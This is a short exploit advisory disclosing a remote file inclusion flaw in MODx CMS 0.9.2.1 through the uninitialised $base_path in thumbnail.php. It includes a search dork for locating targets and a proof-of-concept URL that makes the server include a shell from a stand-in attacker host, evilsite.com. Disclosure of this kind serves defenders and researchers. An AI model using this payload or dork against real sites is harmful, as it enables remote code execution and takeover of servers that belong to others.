MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability

±------------------------------------------------------------------------------------------

• MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
  ±------------------------------------------------------------------------------------------
• Affected Software .: MODx CMS 0.9.2.1
• Vendor …: http://modxcms.com/
• Download …: http://modxcms.com/downloads.html
• Description …: "MODx is an open source PHP Application Framework that helps you take control of your online content."
• Dork …: "powered by MODx"
• Class …: Remote File Inclusion
• Risk …: High (Remote File Execution)
• Found By …: nuffsaid <nuffsaid[at]newbslove.us>
  ±------------------------------------------------------------------------------------------
• Details:
• MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
• the $base_path variable before using it to include files, assuming register_globals = on,
• we can intialize the variable in a query string and include a remote file of our choice.
• Vulnerable Code:
• manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
• -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
• Proof Of Concept:
• http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
  ±------------------------------------------------------------------------------------------